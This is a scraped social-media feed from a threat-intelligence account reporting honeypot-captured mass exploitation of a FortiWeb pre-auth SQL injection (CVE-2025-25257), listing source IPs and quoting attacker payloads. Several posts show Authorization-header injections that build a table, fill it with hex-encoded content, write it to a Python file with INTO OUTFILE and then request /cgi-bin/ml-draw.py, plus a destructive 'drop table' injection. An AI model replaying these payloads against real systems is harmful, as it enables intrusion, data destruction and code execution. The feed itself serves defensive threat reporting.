DefusedCyber Profile Banner
Defused Profile
Defused

@DefusedCyber

Followers
897
Following
224
Media
42
Statuses
134

Real-Time Threat Intelligence via Cyber Deception. Start Building for Free: https://t.co/TTnxgi9Hv5

Joined August 2023
Don't wanna be here? Send us removal request.
@DefusedCyber
Defused
47 minutes
Active adversary mass exploiting CVE-2025-25257 (FortiWeb critical pre-auth SQL injection) - attacks originating from Hetzner . VT Detections: 0/94 . 🚨Attacker is currently engaged with our sandbox, further details to be released. Payloads:. Uses CVE-2025-25257 to establish
Tweet media one
0
0
3
@DefusedCyber
Defused
17 hours
RT @DefusedCyber: Ransomware vulns with highest exploit likelihood ⬆️ (past 30d):. - CVE-2025-53770 (SharePoint. ) +108108.75%.- CVE-2023-2….
0
61
0
@grok
Grok
1 day
What do you want to know?.
82
36
354
@DefusedCyber
Defused
17 hours
RT @DefusedCyber: Exploitation of CVE-2025-25257 from 193.138.7.140 🇫🇮 (FortiWeb critical pre-auth SQL injection). VT Detections: 1/94. (it….
0
3
0
@DefusedCyber
Defused
17 hours
RT @DefusedCyber: Actor exploiting CVE-2025-25257 (FortiWeb SQL Injection). 104.28.253.229 🇩🇿AS 13335 ( CLOUDFLARENET ). 0/94 detections….
0
4
0
@DefusedCyber
Defused
17 hours
RT @DefusedCyber: Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections:….
0
2
0
@DefusedCyber
Defused
17 hours
RT @DefusedCyber: Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/….
0
93
0
@DefusedCyber
Defused
2 days
RT @DefusedCyber: Actor exploiting CVE-2025-25257 from 45.11.80.242 🇮🇹(FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94….
0
15
0
@DefusedCyber
Defused
2 days
Actor exploiting CVE-2025-25257 from 45.11.80.242 🇮🇹(FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payloads (shortened for brevity):. Under path GET /api/fabric/device/status:. ';create/**/table/**/fabric_user.a/**/(a/**/TEXT);--
Tweet media one
Tweet media two
0
15
42
@DefusedCyber
Defused
2 days
More exploit activity from clean IPs:.
@DefusedCyber
Defused
2 days
Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Multiple Payloads: 🧵 . GET /api/fabric/device/status HTTP/1.1 Host: xxx User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br, zstd
Tweet media one
Tweet media two
0
2
3
@DefusedCyber
Defused
2 days
Live threat intelligence was collected with our FortiWeb decoy / honeypot template! 🍯. Deploy it yourself 👉
Tweet media one
0
0
1
@DefusedCyber
Defused
2 days
GET /api/fabric/device/status . Authorization: Bearer ';drop/**/table/**/fabric_user.a;--.
1
0
0
@DefusedCyber
Defused
2 days
GET /cgi-bin/ml-draw.py.
1
0
0
@DefusedCyber
Defused
2 days
GET /api/fabric/device/status . Authorization: Bearer ';use/**/fabric_user;update/**/a/**/set/**/a=(select/**/concat(a,0x2e707927292023)/**/from/**/a);--.
1
0
0
@DefusedCyber
Defused
2 days
GET /api/fabric/device/status . Authorization: Bearer ';use/**/fabric_user;update/**/a/**/set/**/a=(select/**/concat(a,0x707974686f6e332e31302f70796c6162)/**/from/**/a);--.
1
0
0
@DefusedCyber
Defused
2 days
GET /api/fabric/device/status . Authorization: Bearer ';select/**/a/**/from/**/fabric_user.a/**/into/**/outfile/**/'/var/log/lib/python3.10/pylab.py'/**/FIELDS/**/ESCAPED/**/BY/**/'.
1
0
0
@DefusedCyber
Defused
2 days
Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Multiple Payloads: 🧵 . GET /api/fabric/device/status HTTP/1.1 Host: xxx User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br, zstd
Tweet media one
Tweet media two
1
2
15
@DefusedCyber
Defused
3 days
Actor exploiting CVE-2025-25257 (FortiWeb SQL Injection). 104.28.253.229 🇩🇿AS 13335 ( CLOUDFLARENET ). 0/94 detections on VirusTotal
Tweet media one
Tweet media two
0
4
7
@DefusedCyber
Defused
3 days
Exploitation of CVE-2025-25257 from 193.138.7.140 🇫🇮 (FortiWeb critical pre-auth SQL injection). VT Detections: 1/94. (its not us)
Tweet media one
Tweet media two
@DefusedCyber
Defused
3 days
Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payload:.GET /api/fabric/device/status HTTP/1.1 Host: xxxxxx User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br, zstd Accept: */*
Tweet media one
Tweet media two
0
3
12
@DefusedCyber
Defused
3 days
Follow-up payload: . GET /cgi-bin/ml-draw.py
Tweet media one
0
3
14
@DefusedCyber
Defused
3 days
Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payload:.GET /api/fabric/device/status HTTP/1.1 Host: xxxxxx User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br, zstd Accept: */*
Tweet media one
Tweet media two
5
93
363